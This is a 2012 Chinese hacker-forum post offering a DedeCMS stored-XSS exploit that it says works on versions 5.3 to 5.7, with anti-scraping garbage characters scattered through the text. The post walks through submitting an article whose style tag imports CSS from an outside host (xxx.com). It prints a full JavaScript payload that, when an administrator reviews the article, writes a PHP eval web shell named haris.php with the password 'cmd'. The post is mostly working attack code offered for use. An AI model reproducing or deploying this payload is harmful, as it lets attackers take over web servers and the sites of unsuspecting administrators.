找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1796|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell
# }8 d4 K! b& A4 x- _为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
8 ]# ]" d1 {2 i1 ?目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。: m$ `# r; h9 X/ t  c7 {' o
下面说说利用方法。( J- q+ T. _# ?$ I# r
条件有2个:, K; \4 B/ U. A$ n$ B9 k6 L( q; m! l
1.开启注册7 t5 d! t2 [0 Z' s1 b* ]8 q! r; y" D, P
2.开启投稿' S0 ^- Z8 Y" L5 Z* {, v9 k" e
注册会员----发表文章
' b& M) M; C- L6 Q% `内容填写:5 Z* J9 [" A! ?; n. I; {
复制代码
, {: @3 W, M; O5 j8 i8 q! @3 d<style>@im\port'\http://xxx.com/xss.css';</style>1 ]& \- L/ n6 P" N4 L
新建XSS.Css
' i# P5 [9 J6 t( M7 U复制代码
8 N( {4 v& ~  d* t* ?9 n$ I.body{# y/ n& l4 q  e5 p$ ]
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }6 s* t; ^! @) _2 M  Q/ c
新建xss.js 内容为& q: \7 B; e, p' m% A# f; u
复制代码3 U8 L; W9 x# k+ j  E  {
1.var request = false;
$ A5 i: r* V; Z. |' t2.if(window.XMLHttpRequest) {* }( k& D. W9 M* {' C9 g
3.request = new XMLHttpRequest();2 @# r- H0 F; `7 c
4.if(request.overrideMimeType) {
# ?& Q" R- e6 N' [$ |5.request.overrideMimeType('text/xml');
" D8 N" t* `1 V; e6 P6.}( Z/ K# C0 L  T# S" p+ I
7.} else if(window.ActiveXObject) {
9 J# f3 i8 ?- F4 H. S8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
( t  l/ v! Q* R# g# v, A9.for(var i=0; i<versions.length; i++) {
0 s9 ~: _9 N0 p+ Y9 t0 M7 T" _4 V10.try {
1 Z9 R/ r0 a+ Y( {11.request = new ActiveXObject(versions);. u9 G2 c3 k' a9 Q$ [
12.} catch(e) {}
/ Z! g& s- h8 @+ T% a; y13.}
$ C/ U" `# X* S8 r3 ~14.}
8 q0 ]3 R' P! v/ z' ^: ?* s15.xmlhttp=request;
+ b6 n2 W! T/ A  K' i16.function getFolder( url ){/ Z1 P3 E, G( [- f- t7 S
17. obj = url.split('/')
# i3 Y( F- I+ g6 |1 b18. return obj[obj.length-2]
( [# W2 H( T6 `5 i: ~5 |& ?! v19.}7 W9 C* ~# f1 [% R' h
20.oUrl = top.location.href;6 c1 s+ I/ W; e! B
21.u = getFolder(oUrl);* A4 E' a$ {( W! r3 t
22.add_admin();
- j- L" |; a2 w/ J$ I23.function add_admin(){; H/ _2 D# `* d  n
24.var url= "/"+u+"/sys_sql_query.php";
9 f  t; g3 y, M' \$ e4 s! t% {25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
# @/ x8 R% H# X( z6 j( x% L26.xmlhttp.open("POST", url, true);
7 o7 k$ ^  m. g! N* E27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");3 o% S! }& W: w# O  V
28.xmlhttp.setRequestHeader("Content-length", params.length);4 t/ n3 ^- |; [' j6 p& O$ L
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
* H1 Q8 X  [/ G8 T30.xmlhttp.send(params);  Z% I" u& Q" z
31.}2 V: D+ R  U; `6 E
当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表